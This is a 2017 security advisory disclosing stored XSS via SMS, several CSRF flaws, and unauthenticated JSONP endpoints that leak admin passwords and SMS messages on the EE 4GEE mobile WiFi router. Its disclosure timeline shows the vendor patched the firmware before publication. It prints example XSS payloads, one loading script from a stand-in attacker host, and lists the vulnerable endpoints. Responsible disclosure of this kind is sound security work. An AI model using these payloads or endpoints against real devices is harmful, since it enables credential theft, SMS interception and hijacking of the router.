EE 4GEE Wireless Router - Multiple Security Vulnerabilities Advisory
-------------------------------------------------
Hardware Version/Model: 4GEE WiFi MBB (EE60VB-2AE8G83).
Vulnerable Software Version: EE60_00_05.00_25.
Patched Software Version: EE60_00_05.00_31.
Product URL:
https://shop.ee.co.uk/dongles/pay-monthly-mobile-broadband/4gee-wifi/details

Proof of Concept Writeup:
https://blog.jameshemmings.co.uk/2017/08/24/ee-4gee-mobile-wifi-router-multiple-security-vulnerabilities-writeup/#more-276

Disclosure Timeline:
27th July, 2017 at 21:32 GMT. Email sent with technical vulnerability
information and PoC.
27th July, 2017 at 22:00 GMT. Response from EE devices manager,
confirming receipt of PoC.
31th July, 2017 at 18:47 GMT. Update from vendor, patches being
developed for reported issues.
1st August, 2017 at 10:43 GMT. Reply sent to vendor.
10th August, 2017 at 10:32 GMT. Update from vendor, patches still being
developed.
18th August, 2017 at 12:11 GMT. Email sent to vendor asking for update/ETA.
18th August, 2017 at 12:15 GMT. Response from vendor, updates to be
released on Monday.
18th August, 2017 at 12:30 GMT. Reply sent to vendor with device IMEI
for online update process.
22nd August, 2017 at 15:54 GMT. Response from vendor, beta firmware
released to verify changes.
23rd August, 2017 at 21:29 GMT. Reply sent to vendor, vulnerabilities
successfully patched.
24th August, 2017 at 09:32 GMT. Response from vendor, patch publicly
released to customers.
24th August, 2017 at 12:00 GMT. Full disclosure via Blog.

-------------------------------------------------
Stored Cross Site Scripting (XSS) - SMS Messages:
-------------------------------------------------
Attack Type: Remote
Impact: Code Execution
Affected Components:
http://ee.mobilebroadband/default.html#sms/smsList.html?list=inbox
http://ee.mobilebroadband/getSMSlist?rand=0.19598614685224347

Attack Vectors: An attacker can exploit the vulnerability by sending a
remote SMS message to the device with an XSS payload such as "<script
src=http://payload.js</script>" which is executed upon the user viewing
the SMS message within the admin panel "SMS Inbox" functionality.
Additionally, self-XSS can be achieved by creating an XSS payload from
the device its self within a text message, which could be chained with
other vulnerabilities such as CSRF.

Vulnerability Description:The 4GEE Mobile WiFi Router is vulnerable to
Stored Cross Site Scripting (XSS) within the "sms_content" parameter
returned to the application's SMS Inbox webpage by the "getSMSlist" POST
request, due to a lack of input validation and/or encoding. This exploit
can be triggered by remotely sending an SMS message containing any XSS
payload such as '"><script src=http://attacker.tld/r.js></script>' which
upon clicking on the text message within the web application is
successfully executed.

Additionally, due to the other vulnerabilities identified within this
device, such vulnerability can be chained with Cross Site Request
Forgery (CSRF) using the Stored XSS payload to send an JavaScript XHR
POST request to the "uploadSettings" web-page containing binary
configuration data, allowing for total modification of device settings
by an attacker.

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N/E:H/RL:O/RC:C (CVSS V3: 7.1
- High).

Author: James Hemmings - security@jameshemmings.co.uk
Reference(s):
[1]
https://blog.jameshemmings.co.uk/2017/08/21/ee-4gee-mobile-wifi-router-multiple-security-vulnerabilities

-------------------------------------------------
Cross Site Request Forgery (CSRF) - Multiple:
-------------------------------------------------
Attack Type: Remote
Impact: Code Execution
Affected Components:
http://192.168.1.1/goform/AddNewProfile?rand=0.376065695742409
http://192.168.1.1/goform/setWanDisconnect?rand=0.6988130822240772
http://192.168.1.1/goform/setSMSAutoRedirectSetting?rand=0.9003361879232169
http://192.168.1.1/goform/setReset?rand=0.021764703082234105
http://192.168.1.1/goform/uploadBackupSettings

Attack Vectors: An attacker could attempt to trick users into accessing
malicious CSRF payload URLs, which would allow an attacker to execute
privileged functions such as device reset, device reboot, internet
connection and disconnection, SMS message redirection and binary
configuration file upload, which would allow modification of all device
settings. Addtionally, this exploit can be chained together using other
vulnerabilities discovered to be remotely exploitable over SMS, using
Stored Cross Site Scripting (XSS).

Vulnerability Description: The 4GEE Mobile WiFi Router is vulnerable to
multiple Cross Site Request Forgery (CSRF) vulnerabilities within
various router administration web-pages, due to the lack of robust
request verification tokens within requests. An attacker could persuade
an authenticated user to visit a malicious website using phishing and/or
social engineering techniques to send an CSRF request to the web
application, thus executing the privileged function as the authenticated
user. In this case, due to the lack of authentication on certain
privileged functions, authentication may not be necessary.

The following web-pages were identified to be vulnerable to Cross Site
Request Forgery (CSRF) attacks:

AddNewProfile [2].
setWanDisconnect [3].
setSMSAutoRedirectSetting [4].
setReset [5].
uploadBackupSettings [6].

CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N/E:H/RL:O/RC:C (CVSS V3: 6.8
- Medium).

Author: James Hemmings - security@jameshemmings.co.uk
Reference(s):
[1]
https://blog.jameshemmings.co.uk/2017/08/21/ee-4gee-mobile-wifi-router-multiple-security-vulnerabilities

[2]
https://github.com/JamesIT/vuln-advisories-/blob/master/EE-4GEE-Multiple-Vulns/CSRF/AddProfileCSRFXSSPoc.html

[3]
https://github.com/JamesIT/vuln-advisories-/blob/master/EE-4GEE-Multiple-Vulns/CSRF/CSRFInternetDCPoC.html

[4]
https://github.com/JamesIT/vuln-advisories-/blob/master/EE-4GEE-Multiple-Vulns/CSRF/CSRFPocRedirectSMS.html

[5]
https://github.com/JamesIT/vuln-advisories-/blob/master/EE-4GEE-Multiple-Vulns/CSRF/CSRFPocResetDefaults.html

[6]
https://github.com/JamesIT/vuln-advisories-/blob/master/EE-4GEE-Multiple-Vulns/uploadBinarySettingsCSRFPoC.html


-------------------------------------------------
JSONP Sensitive Information Disclosure - Multiple
-------------------------------------------------
Attack Type: Remote
Impact: Information Disclosure
Affected Components:
http://192.168.1.1/goform/getPasswordSaveInfo
http://192.168.1.1/goform/getSingleSMSReport?rand=0.133713371337
http://192.168.1.1/goform/getSingleSMS?sms_id=1&rand=0.133713371337
http://192.168.1.1/goform/getSMSStoreState
http://192.168.1.1/goform/getSMSAutoRedirectSetting
http://192.168.1.1/goform/getSysteminfo
http://192.168.1.1/goform/getUsbIP?rand=0.13371337

Attack Vectors: An attacker on the local network could escalate
privileges from unauthenticated user, to authenticated administrative
user by accessing the saved admin credentials within the JSONP endpoint.
Additionally, an attacker could access network configuration data and
SMS messages without authentication.

Vulnerability Description: The 4GEE Mobile WiFi Router is vulnerable to
multiple JSONP information disclosure vulnerabilities within various
endpoints which retrieve and/or set data. The JSONP endpoints allow for
unauthenticated information disclosure of sensitive configuration data,
settings, administration passwords and SMS messages, due to the lack of
robust and effective access control. An attacker could view such
unauthenticated endpoints via the local WiFi network to gain access to
the administration credentials, router configuration and/or SMS messages.

CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N/E:H/RL:O/RC:C (CVSS V3: 8.1
- High).

Author: James Hemmings - security@jameshemmings.co.uk
Reference(s):
[1]
https://blog.jameshemmings.co.uk/2017/08/21/ee-4gee-mobile-wifi-router-multiple-security-vulnerabilities


-------------------------------------------------
Disclaimer
-------------------------------------------------
The information in the advisory is believed to be accurate at the time
of publishing based on currently available information. Use of the
information constitutes acceptance for use in an AS IS condition. There
are no warranties with regard to this information. Neither the author
nor the publisher accepts any liability for any direct, indirect, or
consequential loss or damage arising from use of, or reliance on, this
information.